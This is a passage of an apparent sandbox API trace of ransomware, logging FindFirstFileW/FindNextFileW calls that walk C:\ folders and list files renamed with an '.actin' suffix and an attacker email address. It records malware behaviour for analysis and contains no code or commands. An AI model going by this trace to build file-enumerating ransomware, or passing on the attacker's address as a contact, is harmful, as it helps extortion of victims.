ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7cf2007e, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7cf2007e, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x4a62, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="SETUPR~1.ACT")) returned 0 [0140.151] FindClose (in: hFindFile=0xaa9450 | out: hFindFile=0xaa9450) returned 1 [0140.152] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x31200a0 | out: hHeap=0x26a0000) returned 1 [0140.153] FindNextFileW (in: hFindFile=0xaa93d0, lpFindFileData=0x2f2f7f0 | out: lpFindFileData=0x2f2f7f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName="1037", cAlternateFileName="")) returned 1 [0140.153] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\*", lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xaa9450 [0140.154] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.154] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cf2007e, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7cf2007e, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7cf2007e, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x1bc2, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="EULART~1.ACT")) returned 1 [0140.154] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cf460aa, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7cf460aa, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7cf460aa, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x11a92, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="LOCALI~1.ACT")) returned 1 [0140.154] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cf460aa, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7cf460aa, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7cf460aa, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x4262, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="SETUPR~1.ACT")) returned 1 [0140.154] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cf460aa, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7cf460aa, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7cf460aa, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x4262, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="SETUPR~1.ACT")) returned 0 [0140.154] FindClose (in: hFindFile=0xaa9450 | out: hFindFile=0xaa9450) returned 1 [0140.155] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x31200a0 | out: hHeap=0x26a0000) returned 1 [0140.155] FindNextFileW (in: hFindFile=0xaa93d0, lpFindFileData=0x2f2f7f0 | out: lpFindFileData=0x2f2f7f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName="1038", cAlternateFileName="")) returned 1 [0140.155] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\*", lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xaa9450 [0140.156] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.156] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cf460aa, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7cf460aa, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7d15c4a5, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x1192, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="EULART~1.ACT")) returned 1 [0140.156] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d077395, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7d077395, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7d09d5ec, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x152b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="LOCALI~1.ACT")) returned 1 [0140.156] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d09d5ec, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7d09d5ec, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7d09d5ec, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x4a62, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="SETUPR~1.ACT")) returned 1 [0140.157] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d09d5ec, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7d09d5ec, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7d09d5ec, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x4a62, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="SETUPR~1.ACT")) returned 0 [0140.157] FindClose (in: hFindFile=0xaa9450 | out: hFindFile=0xaa9450) returned 1 [0140.157] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x31200a0 | out: hHeap=0x26a0000) returned 1 [0140.158] FindNextFileW (in: hFindFile=0xaa93d0, lpFindFileData=0x2f2f7f0 | out: lpFindFileData=0x2f2f7f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName="1040", cAlternateFileName="")) returned 1 [0140.158] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\*", lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xaa9610 [0140.354] FindNextFileW (in: hFindFile=0xaa9610, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.354] FindNextFileW (in: hFindFile=0xaa9610, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d09d5ec, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7d09d5ec, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7d0c37ff, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0xf32, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="EULART~1.ACT")) returned 1 [0147.704] SetLastError (dwErrCode=0x12) [0147.704] GetLastError () returned 0x12 Thread: id = 116 os_tid = 0xfd8 [0140.012] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x38) returned 0x26a9198 [0140.012] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x18) returned 0x26a91d8 [0140.012] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x2b4 [0140.012] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x2b8 [0140.012] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x2bc [0140.012] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x10000) returned 0x30a0060 [0140.012] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x1, lpStartAddress=0x1153a08, lpParameter=0x306fb28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2c0 [0140.013] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x1, lpStartAddress=0x1153a08, lpParameter=0x306fb28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2c4 [0140.014] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x10000) returned 0x30b0068 [0140.014] FindFirstFileW (in: lpFileName="\\\\?\\C:\\*", lpFindFileData=0x306f89c | out: lpFindFileData=0x306f89c*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffff610, dwReserved1=0x0, cFileName="$GetCurrent", cAlternateFileName="$GETCU~1")) returned 0xaa9050 [0140.014] GetLastError () returned 0x0 [0140.014] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x214) returned 0x26a9ac0 [0140.015] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74440000 [0140.015] GetCurrentThreadId () returned 0xfd8 [0140.015] SetLastError (dwErrCode=0x0) [0140.015] GetLastError () returned 0x0 [0140.015] SetLastError (dwErrCode=0x0) [0140.015] GetLastError () returned 0x0 [0140.015] SetLastError (dwErrCode=0x0) [0140.015] GetLastError () returned 0x0 [0140.015] SetLastError (dwErrCode=0x0) [0140.015] GetLastError () returned 0x0 [0140.015] SetLastError (dwErrCode=0x0) [0140.015] GetLastError () returned 0x0 [0140.015] SetLastError (dwErrCode=0x0) [0140.015] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x10000) returned 0x30c0070 [0140.016] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$GetCurrent\\*", lpFindFileData=0x306f618 | out: lpFindFileData=0x306f618*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName=".", cAlternateFileName="")) returned 0xaa9490 [0140.016] FindNextFileW (in: hFindFile=0xaa9490, lpFindFileData=0x306f618 | out: lpFindFileData=0x306f618*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName="..", cAlternateFileName="")) returned 1 [0140.016] FindNextFileW (in: hFindFile=0xaa9490, lpFindFileData=0x306f618 | out: lpFindFileData=0x306f618*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9c5a0a89, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName="Logs", cAlternateFileName="")) returned 1 [0140.016] GetLastError () returned 0x0 [0140.016] SetLastError (dwErrCode=0x0) [0140.016] GetLastError () returned 0x0 [0140.016] SetLastError (dwErrCode=0x0) [0140.016] GetLastError () returned 0x0 [0140.016] SetLastError (dwErrCode=0x0) [0140.016] GetLastError () returned 0x0 [0140.016] SetLastError (dwErrCode=0x0) [0140.016] GetLastError () returned 0x0 [0140.016] SetLastError (dwErrCode=0x0) [0140.016] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x10000) returned 0x30d0078 [0140.017] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$GetCurrent\\Logs\\*", lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9c5a0a89, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xaa91d0 [0140.018] FindNextFileW (in: hFindFile=0xaa91d0, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9c5a0a89, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.018] FindNextFileW (in: hFindFile=0xaa91d0, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c30e245, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c30e245, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c334508, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0xa7e2, dwReserved0=0x0, dwReserved1=0x0, cFileName="downlevel_2017_09_07_02_02_39_766.log.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="DOWNLE~1.ACT")) returned 1 [0140.018] GetLastError () returned 0x0 [0140.018] SetLastError (dwErrCode=0x0) [0140.018] GetLastError () returned 0x0 [0140.018] SetLastError (dwErrCode=0x0) [0140.018] GetLastError () returned 0x0 [0140.018] SetLastError (dwErrCode=0x0) [0140.018] GetLastError () returned 0x0 [0140.018] SetLastError (dwErrCode=0x0) [0140.018] GetLastError () returned 0x0 [0140.018] SetLastError (dwErrCode=0x0) [0140.018] GetLastError () returned 0x0 [0140.018] SetLastError (dwErrCode=0x0) [0140.018] GetLastError () returned 0x0 [0140.018] SetLastError (dwErrCode=0x0) [0140.018] GetLastError () returned 0x0 [0140.018] SetLastError (dwErrCode=0x0) [0140.018] GetLastError () returned 0x0 [0140.019] SetLastError (dwErrCode=0x0) [0140.019] GetLastError () returned 0x0 [0140.019] SetLastError (dwErrCode=0x0) [0140.019] GetLastError () returned 0x0 [0140.019] SetLastError (dwErrCode=0x0) [0140.019] GetLastError () returned 0x0 [0140.019] SetLastError (dwErrCode=0x0) [0140.019] GetLastError () returned 0x0 [0140.019] SetLastError (dwErrCode=0x0) [0140.019] GetLastError () returned 0x0 [0140.019] SetLastError (dwErrCode=0x0) [0140.019] GetLastError () returned 0x0 [0140.019] SetLastError (dwErrCode=0x0) [0140.019] GetLastError () returned 0x0 [0140.019] SetLastError (dwErrCode=0x0) [0140.019] GetLastError () returned 0x0 [0140.019] SetLastError (dwErrCode=0x0) [0140.019] GetLastError () returned 0x0 [0140.019] SetLastError (dwErrCode=0x0) [0140.019] GetLastError () returned 0x0 [0140.019] SetLastError (dwErrCode=0x0) [0140.019] GetLastError () returned 0x0 [0140.019] SetLastError (dwErrCode=0x0) [0140.019] GetLastError () returned 0x0 [0140.020] SetLastError (dwErrCode=0x0) [0140.020] GetLastError () returned 0x0 [0140.020] SetLastError (dwErrCode=0x0) [0140.020] GetLastError () returned 0x0 [0140.020] SetLastError (dwErrCode=0x0) [0140.020] GetLastError () returned 0x0 [0140.020] SetLastError (dwErrCode=0x0) [0140.020] GetLastError () returned 0x0 [0140.020] SetLastError (dwErrCode=0x0) [0140.020] GetLastError () returned 0x0 [0140.020] SetLastError (dwErrCode=0x0) [0140.020] GetLastError () returned 0x0 [0140.020] SetLastError (dwErrCode=0x0) [0140.020] GetLastError () returned 0x0 [0140.020] SetLastError (dwErrCode=0x0) [0140.020] GetLastError () returned 0x0 [0140.020] SetLastError (dwErrCode=0x0) [0140.020] GetLastError () returned 0x0 [0140.020] SetLastError (dwErrCode=0x0) [0140.020] GetLastError () returned 0x0 [0140.020] SetLastError (dwErrCode=0x0) [0140.020] GetLastError () returned 0x0 [0140.020] SetLastError (dwErrCode=0x0) [0140.020] GetLastError () returned 0x0 [0140.021] SetLastError (dwErrCode=0x0) [0140.021] GetLastError () returned 0x0 [0140.021] SetLastError (dwErrCode=0x0) [0140.021] GetLastError () returned 0x0 [0140.021] SetLastError (dwErrCode=0x0) [0140.021] GetLastError () returned 0x0 [0140.021] SetLastError (dwErrCode=0x0) [0140.021] GetLastError () returned 0x0 [0140.021] SetLastError (dwErrCode=0x0) [0140.021] GetLastError () returned 0x0 [0140.021] SetLastError (dwErrCode=0x0) [0140.021] GetLastError () returned 0x0 [0140.021] SetLastError (dwErrCode=0x0) [0140.021] GetLastError () returned 0x0 [0140.021] SetLastError (dwErrCode=0x0) [0140.021] GetLastError () returned 0x0 [0140.021] SetLastError (dwErrCode=0x0) [0140.021] GetLastError () returned 0x0 [0140.021] SetLastError (dwErrCode=0x0) [0140.021] GetLastError () returned 0x0 [0140.021] SetLastError (dwErrCode=0x0) [0140.021] GetLastError () returned 0x0 [0140.021] SetLastError (dwErrCode=0x0) [0140.021] GetLastError () returned 0x0 [0140.022] SetLastError (dwErrCode=0x0) [0140.022] GetLastError () returned 0x0 [0140.022] SetLastError (dwErrCode=0x0) [0140.022] GetLastError () returned 0x0 [0140.022] SetLastError (dwErrCode=0x0) [0140.022] GetLastError () returned 0x0 [0140.022] SetLastError (dwErrCode=0x0) [0140.022] FindNextFileW (in: hFindFile=0xaa91d0, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c334508, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c334508, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c334508, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x18a2, dwReserved0=0x0, dwReserved1=0x0, cFileName="oobe_2017_09_07_03_08_57_737.log.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="OOBE_2~1.ACT")) returned 1 [0140.022] GetLastError () returned 0x0 [0140.022] SetLastError (dwErrCode=0x0) [0140.022] GetLastError () returned 0x0 [0140.022] SetLastError (dwErrCode=0x0) [0140.022] GetLastError () returned 0x0 [0140.022] SetLastError (dwErrCode=0x0) [0140.022] GetLastError () returned 0x0 [0140.022] SetLastError (dwErrCode=0x0) [0140.022] GetLastError () returned 0x0 [0140.022] SetLastError (dwErrCode=0x0) [0140.022] GetLastError () returned 0x0 [0140.022] SetLastError (dwErrCode=0x0) [0140.022] GetLastError () returned 0x0 [0140.022] SetLastError (dwErrCode=0x0) [0140.022] GetLastError () returned 0x0 [0140.022] SetLastError (dwErrCode=0x0) [0140.022] GetLastError () returned 0x0 [0140.023] SetLastError (dwErrCode=0x0) [0140.023] GetLastError () returned 0x0 [0140.023] SetLastError (dwErrCode=0x0) [0140.023] GetLastError () returned 0x0 [0140.023] SetLastError (dwErrCode=0x0) [0140.023] GetLastError () returned 0x0 [0140.023] SetLastError (dwErrCode=0x0) [0140.023] GetLastError () returned 0x0 [0140.023] SetLastError (dwErrCode=0x0) [0140.023] GetLastError () returned 0x0 [0140.023] SetLastError (dwErrCode=0x0) [0140.023] GetLastError () returned 0x0 [0140.023] SetLastError (dwErrCode=0x0) [0140.023] GetLastError () returned 0x0 [0140.023] SetLastError (dwErrCode=0x0) [0140.023] GetLastError () returned 0x0 [0140.023] SetLastError (dwErrCode=0x0) [0140.023] GetLastError () returned 0x0 [0140.023] SetLastError (dwErrCode=0x0) [0140.023] GetLastError () returned 0x0 [0140.023] SetLastError (dwErrCode=0x0) [0140.023] GetLastError () returned 0x0 [0140.023] SetLastError (dwErrCode=0x0) [0140.023] GetLastError () returned 0x0 [0140.024] SetLastError (dwErrCode=0x0) [0140.024] GetLastError () returned 0x0 [0140.024] SetLastError (dwErrCode=0x0) [0140.024] GetLastError () returned 0x0 [0140.024] SetLastError (dwErrCode=0x0) [0140.024] GetLastError () returned 0x0 [0140.024] SetLastError (dwErrCode=0x0) [0140.024] GetLastError () returned 0x0 [0140.024] SetLastError (dwErrCode=0x0) [0140.024] GetLastError () returned 0x0 [0140.024] SetLastError (dwErrCode=0x0) [0140.024] GetLastError () returned 0x0 [0140.024] SetLastError (dwErrCode=0x0) [0140.024] GetLastError () returned 0x0 [0140.024] SetLastError (dwErrCode=0x0) [0140.024] GetLastError () returned 0x0 [0140.024] SetLastError (dwErrCode=0x0) [0140.024] GetLastError () returned 0x0 [0140.024] SetLastError (dwErrCode=0x0) [0140.024] GetLastError () returned 0x0 [0140.024] SetLastError (dwErrCode=0x0) [0140.024] GetLastError () returned 0x0 [0140.024] SetLastError (dwErrCode=0x0) [0140.024] GetLastError () returned 0x0 [0140.025] SetLastError (dwErrCode=0x0) [0140.025] GetLastError () returned 0x0 [0140.025] SetLastError (dwErrCode=0x0) [0140.025] GetLastError () returned 0x0 [0140.025] SetLastError (dwErrCode=0x0) [0140.025] GetLastError () returned 0x0 [0140.025] SetLastError (dwErrCode=0x0) [0140.025] GetLastError () returned 0x0 [0140.025] SetLastError (dwErrCode=0x0) [0140.025] GetLastError () returned 0x0 [0140.025] SetLastError (dwErrCode=0x0) [0140.025] GetLastError () returned 0x0 [0140.025] SetLastError (dwErrCode=0x0) [0140.025] GetLastError () returned 0x0 [0140.025] SetLastError (dwErrCode=0x0) [0140.025] GetLastError () returned 0x0 [0140.025] SetLastError (dwErrCode=0x0) [0140.025] GetLastError () returned 0x0 [0140.025] SetLastError (dwErrCode=0x0) [0140.025] GetLastError () returned 0x0 [0140.025] SetLastError (dwErrCode=0x0) [0140.025] GetLastError () returned 0x0 [0140.025] SetLastError (dwErrCode=0x0) [0140.025] GetLastError () returned 0x0 [0140.025] SetLastError (dwErrCode=0x0) [0140.026] GetLastError () returned 0x0 [0140.026] SetLastError (dwErrCode=0x0) [0140.026] GetLastError () returned 0x0 [0140.026] SetLastError (dwErrCode=0x0) [0140.026] GetLastError () returned 0x0 [0140.026] SetLastError (dwErrCode=0x0) [0140.026] FindNextFileW (in: hFindFile=0xaa91d0, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c6a1810, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c6a1810, ftLastAccessTime.dwHighDateTime=0x1d5328f, 